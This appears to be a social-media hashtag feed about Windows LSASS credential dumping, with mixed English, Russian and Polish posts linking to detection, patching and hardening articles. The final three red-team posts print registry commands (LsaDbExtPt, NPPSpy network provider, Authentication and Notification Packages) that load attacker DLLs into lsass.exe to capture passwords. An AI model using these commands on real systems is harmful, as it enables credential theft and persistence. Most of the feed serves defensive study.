halil deniz1d ago

What is LSASS Memory Dumping Techniques: A Comprehensive Guide

In this article, I cover common LSASS dumping techniques, detection methods, and practical mitigation strategies.
🔗 https://denizhalil.com/2026/05/08/lsass-memory-dumping-techniques-guide/

#LSASS #CredentialDumping #ActiveDirectory #RedTeam

Nightfighter 🛡️Apr 27

Ghost in LSASS: Detecting KslKatz Credential Dumping Framework
#redteam #blueteamsec #attack #lsass #windows #itsecurity

https://detect.fyi/ghost-in-lsass-detecting-kslkatz-credential-dumping-framework-8645f246aec9?gi=8075bb8b8e35

Ghost in LSASS: Detecting KslKatz Credential Dumping Framework

How a kernel-assisted LSASS access path turns into a service-tampering detection opportunity

Medium
HabrApr 15

Хакни себя сам и не дай другим: как увидеть свою инфраструктуру глазами хакера

Всем привет! На связи Дмитрий Федосов, руководитель отдела наступательной безопасности экспертного центра безопасности (PT ESC) Positive Technologies, и Владислав Дриев, ведущий специалист нашего подразделения. Мы развиваем технологии автопентеста в рамках продукта PT Dephaze. Сегодня хотим наглядно показать, как автоматизированный взлом собственной инфраструктуры помогает выявлять реальные векторы атак, которыми злоумышленники могут воспользоваться в любую минуту. С момента запуска PT Dephaze наша команда провела более 60 «пилотов» в организациях России и не только. Мы проанализировали этот опыт, собрали обратную связь от клиентов и улучшили технологии. В этой статье предлагаем вместе погрузиться в процесс использования нашей системы автопентеста на основании опыта наших пользователей. Разберем результаты и варианты их использования в защите.

https://habr.com/ru/companies/pt/articles/1023256/

#автопентест #pt_dephaze #active_directory #aev #goad #csv #lsass #dcsync #esc4 #epp

Хакни себя сам и не дай другим: как увидеть свою инфраструктуру глазами хакера

Всем привет! На связи Дмитрий Федосов, руководитель отдела наступательной безопасности экспертного центра безопасности (PT ESC) Positive Technologies, и Владислав Дриев, ведущий...

Хабр
PressMind LabsJan 14

Microsoft stycznia 2026 – Krytyczne łatki, zero-day i pilne aktualizacje

Czy CVSS 5. 5 może być pilniejsze niż „krytyk”?

Czytaj dalej:
https://pressmind.org/microsoft-stycznia-2026-krytyczne-atki-zero-day-i-pilne-aktualizacje/

#PressMindLabs #cve202620805 #lsass #microsoft #patchtuesday #protectedview

HabrSep 21, 2025

Сдвиг парадигмы в безопасности серверов: как мы пережили Windows Server 2025 и сделали инфраструктуру крепче

Мы поймали странный «обрыв» доступа к нескольким NAS и старому принтер-серверу. В логе — ничего драматического: «не получилось договориться по безопасности». Виноват оказался не «прокси/файрвол», а новая норма безопасности : клиент Windows Server 2025 уже требует подпись SMB-пакетов . Всё, что не умеет — идёт мимо кассы. В тот же месяц у коллег «ложилась» интеграция, ретранслирующая NTLM на LDAP, — и снова не сеть виновата. LDAP-подпись и привязка канала (channel binding) перестали считать ретрансляцию чем-то приемлемым. Зато после шторма заметно стихло количество «подозрительных» попыток бокового смещения. Мораль простая: реактивная модель «ставим патчи и надеемся» больше не тянет . Нужен проактивный дизайн — с нормами безопасности, которые не нужно «включать по желанию», а которые уже встроены в дефолт .

https://habr.com/ru/articles/948976/

#windows_server_2025 #active_directory #SMB_signing #LDAP_signing #kerberos #ntlm #AD_CS #laps #credential_guard #lsass

Сдвиг парадигмы в безопасности серверов: как мы пережили Windows Server 2025 и сделали инфраструктуру крепче

Windows Server 2025 TL;DR:  Windows Server 2025 — это не «ещё один релиз», а разворот к  secure-by-default . Главные перемены: жёстче SMB (подписание по умолчанию на клиенте), отказ от...

Хабр
kriware Sep 20, 2025

Different ways to dump LSASS

Guide to dumping lsass: Task Manager, comsvcs MiniDump, procdump, MiniDumpWriteDump, handle steal, PssCaptureSnapshot, SilentProcessExit.

https://github.com/yo-yo-yo-jbo/dumping_lsass/

#LSASS

GitHub - yo-yo-yo-jbo/dumping_lsass: The different ways to dump lsass

The different ways to dump lsass. Contribute to yo-yo-yo-jbo/dumping_lsass development by creating an account on GitHub.

GitHub
HabrSep 4, 2025

Защита процесса lsass от credential dumping

Процесс lsass.exe (Local Security Authority Subsystem Service) — критически важный компонент ОС Windows. Он отвечает за аутентификацию пользователей и управление учетными данными. В его памяти хранятся хэши паролей NTLM, билеты Kerberos, данные сессий, а в некоторых конфигурациях — даже пароли в открытом виде, если используется устаревший протокол WDigest. Столь высокая концентрация секретов делает lsass.exe лакомой целью для злоумышленников, получивших доступ к системе. После Initial Access фазы атакующий будет стремиться повысить привилегии и двигаться дальше по сети. Дамп памяти lsass.exe — самый прямой и часто самый простой способ достичь этих целей, поскольку при отсутствии защиты атакующий очень легко извлекает оттуда данные для проведения атак Pass-the-hash и Pass-the-ticket. В то же время, для атаки на незащищенный lsass.exe, нужно сравнительно немного: права локального администратора и Mimikatz. Таким образом, защиту этого процесса, по моему мнению, нужно внести в базовый набор мероприятий для любой инфраструктуры с Windows-машинами. Существуют различные методы получения дампа lsass.exe. В материале мы рассмотрим как тривиальные, так и более изощренные, но не с позиции атакующего. Поскольку основная часть материала будет посвящена методам защиты lsass от извлечения данных, знакомство с различными способами атаки будет играть вспомогательную роль для лучшего понимания механики защитных мер.

https://habr.com/ru/companies/first/articles/943490/

#lsass #mimikatz #credentials

Защита процесса lsass от credential dumping

Процесс lsass.exe (Local Security Authority Subsystem Service) — критически важный компонент ОС Windows. Он отвечает за аутентификацию пользователей и управление учетными данными. В его памяти...

Хабр
Show threadWho Let The Dogs Out 🐾Aug 16, 2025

#red_team #lsass #hacking

Существуют также специфичные ключи реестра.

Первый — `LSASS Driver`. Это недокументированное значение реестра, в которое можно засунуть библиотеку и она будет загружена в процесс `lsass.exe`.

```ps1
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\windows\system32\1.dll"
```

- https://github.com/oxfemale/LogonCredentialsSteal .

Также `LsaExtensionConfig`:

```reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LsaExtensionConfig\Interfaces\1002
```

- https://github.com/Maldev-Academy/LsassHijackingViaReg

Наконец, существует возможность злоупотребления службой `KeyISO` для подгрузки библиотеки в процесс lsass.exe, этот метод описывал itm4n в статье (https://itm4n.github.io/ghost-in-the-ppl-part-1/).

GitHub - oxfemale/LogonCredentialsSteal: LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file.

LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file. - oxfemale/LogonCredentialsSteal

GitHub
Show threadWho Let The Dogs Out 🐾Aug 16, 2025

#red_team #lsass #hacking

Диспетчер УД

```ps1
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll"
```

Подробнее:
- https://xakep.ru/2023/03/15/windows-password;
- https://habr.com/ru/articles/709128/ - проект по отслеживанию изменения пароля пользователей.

Поставщик небезопасности. Как Windows раскрывает пароль пользователя

Большинство механизмов защиты в Windows строится на паролях учетных записей пользователей. В сегодняшней статье мы разберем несколько способов перехвата паролей в момент авторизации пользователя и напишем код для автоматизации этого процесса.

Show threadWho Let The Dogs Out 🐾Aug 16, 2025

#red_team #lsass #hacking

- https://github.com/mdsecactivebreach/DragonCastle - загрузка через RPC + python-обвязка для использования с Kali Linux.

Помимо `Security Packages`, вы можете грузить `Authentication Packages`, `Notification Packages` и компоненты диспетчера учётных данных. Последний способ уже не работает на современных системах. Также не существует отдельного API-вызова , требуется править реестр и перезагружать систему.

Затронуты следующие ключи реестра:

`Authentication Packages`

```cmd
reg add hklm\system\currentcontrolset\control\lsa\ /v "Authentication Packages" /d "msv1_0"\0"fulllegit" /t REG_MULTI_SZ
```

`Notification Packages`

```cmd
reg add "hklm\system\currentcontrolset\control\lsa" /v "notification packages" /d scecli\0evilpwfilter /t reg_multi_sz
```

GitHub - mdsecactivebreach/DragonCastle: A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process. - mdsecactivebreach/DragonCastle

GitHub